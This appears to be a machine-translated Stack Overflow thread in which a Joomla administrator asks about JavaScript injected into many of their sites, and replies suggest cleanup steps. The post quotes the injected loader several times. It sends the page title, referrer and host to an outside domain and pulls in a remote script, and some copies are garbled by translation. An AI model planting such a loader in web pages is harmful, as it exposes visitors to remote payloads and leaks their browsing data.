Javascript 脚本注入Joomla模板
我管理很多Joomla网站,几个月前,在所有这些网站上,开始出现一些非常复杂的脚本 就像上面这个: 所以我手动删除了所有,但它们再次出现:( 有人能帮我理解发生了什么吗?我应该编辑一些文件来防止这种情况发生吗 非常感谢Javascript 脚本注入Joomla模板,javascript,php,joomla,Javascript,Php,Joomla,我管理很多Joomla网站,几个月前,在所有这些网站上,开始出现一些非常复杂的脚本 就像上面这个: 所以我手动删除了所有,但它们再次出现:( 有人能帮我理解发生了什么吗?我应该编辑一些文件来防止这种情况发生吗 非常感谢 var a='';setTimeout(10);var default_关键字=encodeURIComponent(document.title);var se_referer=encodeURIComponent(document.referer);var host=enco
var a='';setTimeout(10);var default_关键字=encodeURIComponent(document.title);var se_referer=encodeURIComponent(document.referer);var host=encodeURIComponent(window.location.host);var base=”http://houstonluxlife.com/js/jquery.min.php“var n_url=base+”?default_keyword=“+default_keyword+”&se_referer=”+se_referer+“&source=“+host;var f_url=base+”?c_utt=snt2014&c_utm=“+encodeURIComponent(n_url);if(default_关键字!==null&&default_关键字!==”&&se_referer!==null&&se_referer!==”{document.write('type=“text/javascript”src=“'+f_url+”>“+”)}如果您不确定攻击发生的时间,因此无法回滚到以前的版本,请使用新下载的代码(Joomla core、下载的组件等)替换所有代码。查看images文件夹,检查它是否仅包含图像(没有php脚本或其他可疑文件)。如果您有自定义代码,请查看此代码以检查其中是否没有注入任何内容。然后再次重置所有密码(ftp、用户密码、db密码等)。然后您就可以了。所以,这有点复杂!但我发现我的服务器被黑客攻击了 我拥有的服务器结构:
joomlasite (folder 1)
otherjoomlasite (folder2)
bigjoomlasite (folder3)
(...)
php.ini
public_html
joomlasite
joomlasite.com (hacked issue - so i deleted this folder)
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
otherjoomlasite
otherjoomlasite.org
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
bigjoomlasite (folder3)
bigjoomlasite.io
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
alias.php (strange file)
article.php (strange file)
css.php (strange file)
var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}
var a='';setTimeout(10);var default_关键字=encodeURIComponent(document.title);var se_referer=encodeURIComponent(document.referer);var host=encodeURIComponent(window.location.host);var base=”http://houstonluxlife.com/js/jquery.min.php“var n_url=base+”?默认_关键字=“+default_关键字+”&se_referer=“+se_referer+“&source=“+host;var f_url=base+”?c_utt=snt2014&c_utm=“+encodeURIComponent(n_url);if(default_关键字!==null&&default_关键字!==”&&se_referer!==null&&se_referer!==”{document.write('type=“text/javascript”src=“+f_url+”>“+”>+”)”
谢谢你的回答和建议…你可以看一下。你知道这是怎么发生的吗?我正在寻找一种方法来保护我的网站免受这些攻击。我们已经被黑客攻击很多次了,所以我想这不是最后一次有人试图用这些黑客攻击你的网站了。我@Shide,我没有找到你我不知道这是怎么发生的,但做了一些有助于预防的措施,但不是简单的解决办法,因为我直到现在都没有问题,不知道将来是否会有这个问题。我使用共享主机,所以我在digital ocean上改为vpn机器,开始使用nginx反向代理作为服务器,并在nginx config fi上使用了一些脚本le来防止攻击。如果你想在这里放一个脚本文件的链接或提供更多信息;)很好,谢谢!但是我们的主机提供商不允许我们进入服务器深度配置。事实上,我现在已经厌倦了joomla,所以我只想用AWS/nginx/NodeJS开发一个新网站,这很好。谢谢你的支持评论!